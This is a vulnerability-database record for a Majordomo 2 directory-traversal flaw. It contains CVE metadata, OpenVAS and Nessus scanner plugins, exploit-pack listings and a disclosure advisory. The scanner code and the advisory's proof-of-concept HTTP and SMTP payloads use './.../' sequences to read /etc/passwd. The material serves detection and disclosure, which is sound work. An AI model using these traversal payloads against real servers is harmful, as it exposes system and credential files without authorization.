Majordomo 2 File Disclosure

2012-04-27T00:00:00

Description

File disclosure vulnerability in Majordomo 2 help command Vulnerability Type: File Disclosure

{"id": "E-140", "type": "dsquare", "bulletinFamily": "exploit", "title": "Majordomo 2 File Disclosure", "description": "File disclosure vulnerability in Majordomo 2 help command\n\nVulnerability Type: File Disclosure", "published": "2012-04-27T00:00:00", "modified": "2013-04-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "", "reporter": "Dsquare Security", "references": ["https://vulners.com/BID/BID:46127", "https://vulners.com/NID/NID:52000", "https://vulners.com/OSVDB/OSVDB:71087"], "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "immutableFields": [], "lastseen": "2021-07-28T14:33:45", "viewCount": 15, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:363726"]}, {"type": "cve", "idList": ["CVE-2011-0049", "CVE-2011-0063"]}, {"type": "d2", "idList": ["D2SEC_MAJORDOMO", "D2SEC_MAJORDOMO2"]}, {"type": "exploitdb", "idList": ["EDB-ID:16103"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:ADF3F1E022806BE8557129BCD419E365"]}, {"type": "nessus", "idList": ["MAJORDOMO2_DIR_TRAVERSAL.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-MAJORDOMO2-DIR-TRAVERSAL.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801838"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:98116", "PACKETSTORM:99093"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25607", "SECURITYVULNS:DOC:25895", "SECURITYVULNS:VULN:11397"]}, {"type": "seebug", "idList": ["SSV:70661"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-0049", "CVE-2011-0063"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:ADF3F1E022806BE8557129BCD419E365"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/MAJORDOMO2_DIRECTORY_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801838"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11397"]}, {"type": "seebug", "idList": ["SSV:70661"]}]}, "exploitation": null, "vulnersScore": -0.3}, "sourceData": "For the exploit source code contact DSquare Security sales team.", "_state": {"dependencies": 1659906152, "score": 1659906570}, "_internal": {"score_hash": "83d2188d82c56354fa213352e7714362"}}

{"openvas": [{"lastseen": "2020-05-08T19:10:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0063", "CVE-2011-0049"], "description": "The host is running Majordomo2 and is prone to directory traversal\n vulnerability.", "modified": "2020-05-06T00:00:00", "published": "2011-02-07T00:00:00", "id": "OPENVAS:1361412562310801838", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801838", "type": "openvas", "title": "Majordomo2 Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Majordomo2 Directory Traversal Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801838\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-02-07 15:21:16 +0100 (Mon, 07 Feb 2011)\");\n script_bugtraq_id(46127);\n script_cve_id(\"CVE-2011-0049\", \"CVE-2011-0063\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Majordomo2 Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://sitewat.ch/en/Advisory/View/1\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/16103/\");\n script_xref(name:\"URL\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=628064\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to obtain sensitive information\n that could aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Majordomo2 Build 20110203 and prior.\");\n\n script_tag(name:\"insight\", value:\"The flaw is caused by improper validation of user-supplied input via the\n 'help' parameter in 'mj_wwwusr', which allows attacker to read arbitrary\n files via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Majordomo2 Build 20110204 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running Majordomo2 and is prone to directory traversal\n vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nfiles = traversal_files();\n\nforeach dir( make_list_unique( \"/\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n res = http_get_cache( item:dir + \"/mj_wwwusr\", port:port );\n\n if( '>Majordomo' >< res ) {\n\n foreach file( keys( files ) ) {\n\n url = dir + \"/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../\" +\n \"../../../../../../\" + files[file];\n\n if( http_vuln_check( port:port, url:url, pattern:file ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T11:29:21", "description": "The _list_file_get function in lib/Majordomo.pm in Majordomo 2 20110203 and earlier allows remote attackers to conduct directory traversal attacks and read arbitrary files via a ./.../ sequence in the \"extra\" parameter to the help command, which causes the regular expression to produce .. (dot dot) sequences. NOTE: this vulnerability is due to an incomplete fix for CVE-2011-0049.", "cvss3": {}, "published": "2011-03-15T17:55:00", "type": "cve", "title": "CVE-2011-0063", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "modified": "2018-10-10T20:09:00", "cpe": ["cpe:/a:mj2:majordomo_2:20110113", "cpe:/a:mj2:majordomo_2:20110124", "cpe:/a:mj2:majordomo_2:20110109", "cpe:/a:mj2:majordomo_2:20110107", "cpe:/a:mj2:majordomo_2:20110125", "cpe:/a:mj2:majordomo_2:20110118", "cpe:/a:mj2:majordomo_2:20110123", "cpe:/a:mj2:majordomo_2:20110106", "cpe:/a:mj2:majordomo_2:20110127", "cpe:/a:mj2:majordomo_2:20110114", "cpe:/a:mj2:majordomo_2:20110115", "cpe:/a:mj2:majordomo_2:20110131", "cpe:/a:mj2:majordomo_2:20110112", "cpe:/a:mj2:majordomo_2:20110121", "cpe:/a:mj2:majordomo_2:20110104", "cpe:/a:mj2:majordomo_2:20110102", "cpe:/a:mj2:majordomo_2:20110129", "cpe:/a:mj2:majordomo_2:20110120", "cpe:/a:mj2:majordomo_2:20110201", "cpe:/a:mj2:majordomo_2:20110202", "cpe:/a:mj2:majordomo_2:20110126", "cpe:/a:mj2:majordomo_2:20110105", "cpe:/a:mj2:majordomo_2:20110122", "cpe:/a:mj2:majordomo_2:20110111", "cpe:/a:mj2:majordomo_2:20110101", "cpe:/a:mj2:majordomo_2:20110130", "cpe:/a:mj2:majordomo_2:20110103", "cpe:/a:mj2:majordomo_2:20110110", "cpe:/a:mj2:majordomo_2:20110203", "cpe:/a:mj2:majordomo_2:20110116", "cpe:/a:mj2:majordomo_2:20110119", "cpe:/a:mj2:majordomo_2:20110117", "cpe:/a:mj2:majordomo_2:20110108", "cpe:/a:mj2:majordomo_2:20110128"], "id": "CVE-2011-0063", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0063", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mj2:majordomo_2:20110111:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110102:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110118:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110113:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110125:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110130:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110131:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110201:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110203:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110109:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110101:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110119:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110103:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110112:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110121:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110110:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110126:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110123:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110108:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110128:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110127:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110120:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110104:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110117:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110116:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110124:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110107:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110106:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110129:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110122:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110115:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110114:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110105:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110202:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:06", "description": "Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.", "cvss3": {}, "published": "2011-02-04T01:00:00", "type": "cve", "title": "CVE-2011-0049", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049"], "modified": "2018-10-10T20:09:00", "cpe": ["cpe:/a:mj2:majordomo_2:20110113", "cpe:/a:mj2:majordomo_2:20110124", "cpe:/a:mj2:majordomo_2:20110109", "cpe:/a:mj2:majordomo_2:20110107", "cpe:/a:mj2:majordomo_2:20110125", "cpe:/a:mj2:majordomo_2:20110118", "cpe:/a:mj2:majordomo_2:20110123", "cpe:/a:mj2:majordomo_2:20110106", "cpe:/a:mj2:majordomo_2:20110127", "cpe:/a:mj2:majordomo_2:20110114", "cpe:/a:mj2:majordomo_2:20110115", "cpe:/a:mj2:majordomo_2:20110112", "cpe:/a:mj2:majordomo_2:20110121", "cpe:/a:mj2:majordomo_2:20110104", "cpe:/a:mj2:majordomo_2:20110102", "cpe:/a:mj2:majordomo_2:20110129", "cpe:/a:mj2:majordomo_2:20110120", "cpe:/a:mj2:majordomo_2:20110126", "cpe:/a:mj2:majordomo_2:20110105", "cpe:/a:mj2:majordomo_2:20110122", "cpe:/a:mj2:majordomo_2:20110101", "cpe:/a:mj2:majordomo_2:20110130", "cpe:/a:mj2:majordomo_2:20110111", "cpe:/a:mj2:majordomo_2:20110103", "cpe:/a:mj2:majordomo_2:20110110", "cpe:/a:mj2:majordomo_2:20110116", "cpe:/a:mj2:majordomo_2:20110119", "cpe:/a:mj2:majordomo_2:20110117", "cpe:/a:mj2:majordomo_2:20110108", "cpe:/a:mj2:majordomo_2:20110128"], "id": "CVE-2011-0049", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0049", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mj2:majordomo_2:20110111:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110102:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110113:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110118:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110125:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110130:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110109:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110101:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110119:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110121:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110112:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110103:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110110:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110126:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110123:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110108:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110128:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110127:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110120:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110104:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110117:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110116:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110124:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110107:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110106:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110129:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110115:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110122:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110114:*:*:*:*:*:*:*", "cpe:2.3:a:mj2:majordomo_2:20110105:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-08-19T13:01:44", "description": "The version of Majordomo 2 on the remote host fails to sanitize input to the 'extra' parameter of the 'mj_wwwusr' script before using it to return the contents of a file.\n\nAn attacker can leverage this issue using a directory traversal sequence to view arbitrary files on the affected host within the context of the web server. Information harvested may aid in launching further attacks.\n\nNote that this issue is also reportedly exploitable through Majordomo's email interface, although Nessus has not checked for that.", "cvss3": {"score": null, "vector": null}, "published": "2011-02-16T00:00:00", "type": "nessus", "title": "Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0049", "CVE-2011-0063"], "modified": "2021-01-19T00:00:00", "cpe": [], "id": "MAJORDOMO2_DIR_TRAVERSAL.NASL", "href": "https://www.tenable.com/plugins/nessus/52000", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(52000);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0049\", \"CVE-2011-0063\");\n script_bugtraq_id(46127);\n script_xref(name:\"CERT\", value:\"363726\");\n script_xref(name:\"EDB-ID\", value:\"16103\");\n script_xref(name:\"Secunia\", value:\"43125\");\n script_xref(name:\"Secunia\", value:\"43631\");\n\n script_name(english:\"Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to grab /etc/passwd.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server hosts a web application that contains a\ndirectory traversal vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Majordomo 2 on the remote host fails to sanitize input\nto the 'extra' parameter of the 'mj_wwwusr' script before using it to\nreturn the contents of a file.\n\nAn attacker can leverage this issue using a directory traversal\nsequence to view arbitrary files on the affected host within the\ncontext of the web server. Information harvested may aid in launching\nfurther attacks.\n\nNote that this issue is also reportedly exploitable through\nMajordomo's email interface, although Nessus has not checked for\nthat.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Majordomo 2 build 20110204 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Majordomo 2 File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n # http://web.archive.org/web/20110726024342/https://sitewat.ch/en/Advisory/View/1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1456bb52\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://attrition.org/pipermail/vim/2011-February/002502.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2011/Mar/93\"\n );\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"majordomo_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/majordomo\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\n# Check that Majordomo is installed on this port.\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(appname:\"majordomo\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Try and exploit the path traversal.\nexploited = FALSE;\ndotdot = \"./../././../././../././../././../././../././../././../././../././../././../.\";\nurl = \"/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=\" + dotdot + \"/etc/passwd\";\n\n# Make the GET request for /etc/passwd.\nres = http_send_recv3(\n item : dir + url,\n method : \"GET\",\n port : port,\n exit_on_fail : TRUE\n);\n\n# Check if we got /etc/passwd.\nif (!egrep(string:res[2], pattern:\"root:.*:0:[01]:\"))\n exit(0, \"The Majordomo install at \"+build_url(port:port, qs:dir+'/mj_wwwusr')+\" is not affected.\");\n\nif (report_verbosity > 0)\n{\n trailer = \"\";\n if (report_verbosity > 1)\n {\n res[2] = data_protection::redact_etc_passwd(output:res[2]);\n bar = crap(data:\"-\", length:30);\n trailer +=\n 'Here are the contents of the /etc/passwd file :\\n\\n'+\n bar + \" snip \" + bar + '\\n';\n trailer += egrep(string:res[2], pattern:\"^([^:]*:){6}[^:]*$\");\n trailer +=\n bar + \" snip \" + bar + '\\n';\n }\n\n report = get_vuln_report(trailer:trailer, items:install[\"dir\"] + url, port:port);\n\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "d2": [{"lastseen": "2021-07-28T14:32:23", "description": "**Name**| d2sec_majordomo2 \n---|--- \n**CVE**| CVE-2011-0063 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_majordomo2 \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2011-03-15T17:55:00", "title": "DSquare Exploit Pack: D2SEC_MAJORDOMO2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-15T17:55:00", "id": "D2SEC_MAJORDOMO2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_majordomo2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:32:23", "description": "**Name**| d2sec_majordomo \n---|--- \n**CVE**| CVE-2011-0049 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_majordomo \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2011-02-04T01:00:00", "title": "DSquare Exploit Pack: D2SEC_MAJORDOMO", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049"], "modified": "2011-02-04T01:00:00", "id": "D2SEC_MAJORDOMO", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_majordomo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:07", "description": "", "cvss3": {}, "published": "2011-03-08T00:00:00", "type": "packetstorm", "title": "Majordomo2 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-08T00:00:00", "id": "PACKETSTORM:99093", "href": "https://packetstormsecurity.com/files/99093/Majordomo2-Directory-Traversal.html", "sourceData": "`______________________________________________________________________ \n-------------------------- NSOADV-2011-003 --------------------------- \n \nMajordomo2 'help' Command Directory Traversal (Patch Bypass) \n______________________________________________________________________ \n______________________________________________________________________ \n \n111101111 \n11111 00110 00110001111 \n111111 01 01 1 11111011111111 \n11111 0 11 01 0 11 1 1 111011001 \n11111111101 1 11 0110111 1 1111101111 \n1001 0 1 10 11 0 10 11 1111111 1 111 111001 \n111111111 0 10 1111 0 11 11 111111111 1 1101 10 \n00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 \n10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 \n0111111110 0110 1110 1 0 11101111111111111011 11100 00 \n01111 0 10 1110 1 011111 1 111111111111111111111101 01 \n01110 0 10 111110 110 0 11101111111111111111101111101 \n111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 \n111110110 10 0111110 1 0 0 1111111111111111111111111 110 \n111 11111 1 1 111 1 10011 101111111111011111111 0 1100 \n111 10 110 101011110010 11111111111111111111111 11 0011100 \n11 10 001100 0001 111111111111111111 10 11 11110 \n11110 00100 00001 10 1 1111 101010001 11111111 \n11101 0 1011 10000 00100 11100 00001101 0 \n0110 111011011 0110 10001 101 11110 \n1011 1 10 101 000001 01 00 \n1010 1 11001 1 1 101 10 \n110101011 0 101 11110 \n110000011 \n111 \n______________________________________________________________________ \n______________________________________________________________________ \n \nTitle: Majordomo2 'help' Command Directory Traversal \nSeverity: Medium \nAdvisory ID: NSOADV-2011-003 \nCVE: CVE-2011-0063 \nFound Date: 03.02.2011 \nDate Reported: 03.02.2011 \nRelease Date: 19.02.2011 \nAuthor: Nikolas Sotiriu \nMail: nso-research at sotiriu.de \nWebsite: http://sotiriu.de/ \nTwitter: http://twitter.com/nsoresearch \nAdvisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt \nVendor/Project: http://www.mj2.org/ \nAffected Products: majordomo2 <= 20110203 \nRemote Exploitable: Yes \nLocal Exploitable: No \nPatch Status: Vendor released a patch (See Solution) \nDiscovered by: Nikolas Sotiriu \nDisclosure Policy: http://sotiriu.de/policy.html \nThanks to: Thierry Zoller: For the permission to use his \nPolicy \n \n \n \nBackground: \n=========== \n \nMajordomo 2 is an upwardly-compatible rewrite of the popular majordomo \nmailing list manager software by Jason Tibbitts and Michael Yount. \n \n \n \nDescription: \n============ \n \nMajordomo2 <= 20110203 is affected by a Directory Traversal \nvulnerability due to parameter 'extra' of the 'help' command in the \nfunction '_list_file_get()' is not properly sanitized. \n \nThe original bug was made public on 03.02.2011 by Michael Brooks \nof sitewat.ch: \n \nhttps://sitewat.ch/en/Advisory/View/1 \nhttps://bugzilla.mozilla.org/show_bug.cgi?id=628064 \n \nI discovered, that the patch, which is in the CVS since version 20110125 \ndon't protect against the Directory Traversal bug. \n \nhttps://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 \n \nThe diff build in the regex '$file =~ s!/?\\.\\./?!!g;', which deletes \n'../' from $file. Bypassing this regex is quiet simple by using './.../' \ninsted '../'. \n \n \n \nProof of Concept : \n================== \n \nHTTP: \nhttp://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help& \nextra=./..././..././..././..././..././..././..././.../etc/passwd \n \nSMTP: \nhelp ./..././..././..././..././..././..././..././.../etc/passwd \n \n \n \nSolution: \n========= \n \nUpdate to Majordomo2 >= 20110204 \n 